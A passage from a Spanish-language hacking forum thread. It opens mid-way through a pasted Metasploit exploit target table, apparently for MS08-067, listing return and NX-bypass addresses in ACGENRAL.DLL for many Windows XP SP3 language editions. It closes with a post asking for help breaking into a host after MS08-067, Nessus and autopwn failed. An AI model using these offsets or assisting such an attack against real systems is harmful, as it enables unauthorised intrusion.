'Scratch'   => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Danish (NX)',
{
'Ret'       => 0x5978f807,
'DisableNX' => 0x597917c2,
'Scratch'   => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 German (NX)',
{
'Ret'       => 0x6fd9f807,
'DisableNX' => 0x6fda17c2,
'Scratch'   => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Greek (NX)',
{
'Ret'       => 0x592af807,
'DisableNX' => 0x592b17c2,
'Scratch'   => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL


# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Spanish (NX)',
{
'Ret'       => 0x6fdbf807,
'DisableNX' => 0x6fdc17c2,
'Scratch'   => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Finnish (NX)',
{
'Ret'       => 0x597df807,
'DisableNX' => 0x597e17c2,
'Scratch'   => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 French (NX)',
{
'Ret'       => 0x595bf807,
'DisableNX' => 0x595c17c2,
'Scratch'   => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Hebrew (NX)',
{
'Ret'       => 0x5940f807,
'DisableNX' => 0x594117c2,
'Scratch'   => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Hungarian (NX)',
{
'Ret'       => 0x5970f807,
'DisableNX' => 0x597117c2,
'Scratch'   => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Italian (NX)',
{
'Ret'       => 0x596bf807,
'DisableNX' => 0x596c17c2,
'Scratch'   => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Japanese (NX)',
{
'Ret'       => 0x567fd4d2,
'DisableNX' => 0x568017c2,
'Scratch'   => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Korean (NX)',
{
'Ret'       => 0x6fd6f807,
'DisableNX' => 0x6fd717c2,
'Scratch'   => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Dutch (NX)',
{
'Ret'       => 0x596cf807,
'DisableNX' => 0x596d17c2,
'Scratch'   => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Norwegian (NX)',
{
'Ret'       => 0x597cf807,
'DisableNX' => 0x597d17c2,
'Scratch'   => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Polish (NX)',
{
'Ret'       => 0x5941f807,
'DisableNX' => 0x594217c2,
'Scratch'   => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Portuguese - Brazilian (NX)',
{
'Ret'       => 0x596ff807,
'DisableNX' => 0x597017c2,
'Scratch'   => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Portuguese (NX)',
{
'Ret'       => 0x596bf807,
'DisableNX' => 0x596c17c2,
'Scratch'   => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Russian (NX)',
{
'Ret'       => 0x6fe1f807,
'DisableNX' => 0x6fe217c2,
'Scratch'   => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Swedish (NX)',
{
'Ret'       => 0x597af807,
'DisableNX' => 0x597b17c2,
'Scratch'   => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Turkish (NX)',
{
'Ret'       => 0x5a78f807,
'DisableNX' => 0x5a7917c2,
'Scratch'   => 0x00020408
}

Una vez dicho esto, quiero pedirles ayuda, como puedo hacerlo? estoy encerrado, no se como hacerlo, y conozco muy pocas vulnerabilidades que explotar, la que mas usaba era la ms08_67_netapi pero esta vez ha fallado, y hechandole con el sacner nessus y un autopwn tampoco tira ( no esperaba mucho de este ultimo -.-').

Admito vulnerabilidades posibles en el host.

Si lo consigo lo masterizare como guia de ataque modelo.

Saludos y gracias a tod@s.

Páginas: 1 2 3 4 5 6 7 8 9 [10] 11 12 13 14 15 16
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines